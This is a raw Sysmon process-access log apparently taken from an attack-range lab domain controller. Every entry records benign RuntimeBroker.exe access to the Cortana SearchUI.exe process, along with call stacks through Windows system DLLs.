12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007535Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007534Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007533Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007532Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007531Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007530Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007529Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1528d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009 10341000x80000000000000007528Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000007527Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000007526Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11b6c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007525Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007524Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007523Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007522Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007521Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1528d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009 10341000x80000000000000007520Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000007519Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000007518Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11b6c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007517Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
